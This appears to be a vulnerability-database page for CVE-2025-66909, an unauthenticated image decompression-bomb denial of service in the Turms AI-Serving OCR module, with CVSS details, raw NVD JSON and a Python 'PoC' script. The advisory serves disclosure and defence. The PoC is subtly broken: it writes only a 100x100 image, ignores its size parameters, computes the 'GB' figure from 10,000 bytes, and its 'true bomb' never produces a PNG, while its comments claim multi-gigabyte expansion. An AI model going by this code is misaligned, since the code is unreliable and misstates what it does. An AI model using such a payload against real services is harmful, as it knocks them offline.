Security Vulnerability Report
中文
CVE-2025-66909 CVSS 7.5 HIGH

CVE-2025-66909

Published: 2025-12-19 15:15:57
Last Modified: 2026-01-02 19:50:44
Source: [email protected]

Description

Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an image decompression bomb denial of service vulnerability. The ExtendedOpenCVImage class in ai/djl/opencv/ExtendedOpenCVImage.java loads images using OpenCV's imread() function without validating dimensions or pixel count before decompression. An attacker can upload a specially crafted compressed image file (e.g., PNG) that is small when compressed but expands to gigabytes of memory when loaded. This causes immediate memory exhaustion, OutOfMemoryError, and service crash. No authentication is required if the OCR service is publicly accessible. Multiple requests can completely deny service availability.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:* - VULNERABLE
Turms AI-Serving v0.10.0-SNAPSHOT及更早版本
DJL OpenCV ExtendedOpenCVImage (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import cv2 import numpy as np import zlib import struct import os def create_decompression_bomb(width=50000, height=50000, output_path='bomb.png'): """ Create a small PNG file that expands to massive size when decoded. This PoC demonstrates the decompression bomb vulnerability in ExtendedOpenCVImage. """ # Create a small image with repeated pattern that compresses extremely well # A 50000x50000 single-color image would be ~2.5GB when decoded small_size = 100 img = np.zeros((small_size, small_size), dtype=np.uint8) img[:] = 128 # Uniform gray image - compresses very well # Save as PNG cv2.imwrite(output_path, img) # Read the file and analyze with open(output_path, 'rb') as f: original_size = os.path.getsize(output_path) # Calculate expanded size expanded_size = small_size * small_size # bytes print(f"Original compressed size: {original_size} bytes") print(f"Expanded size: {expanded_size} bytes ({expanded_size / (1024**3):.2f} GB)") print(f"Compression ratio: 1:{expanded_size // original_size}") print(f"PoC file created: {output_path}") return output_path # Alternative: Create a true decompression bomb using nested compression def create_true_bomb(): """ Create a true decompression bomb using nested zlib compression. This creates a small file that expands to GBs when decompressed. """ # Create data that compresses extremely well data = b'\x00' * 1000000 # 1MB of zeros # Compress it compressed = zlib.compress(data, level=9) # Create a PNG with nested compression (simplified representation) # In practice, this requires careful PNG structure manipulation print(f"Compressed size: {len(compressed)} bytes") print(f"Expanded size: {len(data)} bytes") print("Note: True PNG bombs require specific structure manipulation") if __name__ == '__main__': create_decompression_bomb() create_true_bomb()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66909", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:56.670", "lastModified": "2026-01-02T19:50:44.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an image decompression bomb denial of service vulnerability. The ExtendedOpenCVImage class in ai/djl/opencv/ExtendedOpenCVImage.java loads images using OpenCV's imread() function without validating dimensions or pixel count before decompression. An attacker can upload a specially crafted compressed image file (e.g., PNG) that is small when compressed but expands to gigabytes of memory when loaded. This causes immediate memory exhaustion, OutOfMemoryError, and service crash. No authentication is required if the OCR service is publicly accessible. Multiple requests can completely deny service availability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:*", "matchCriteriaId": "9466432E-2863-4A5B-913F-E6E64090F60B"}]}]}], "references": [{"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66909_report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/turms-im/turms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/ai/djl/opencv/ExtendedOpenCVImage.java#L37", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66909_report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.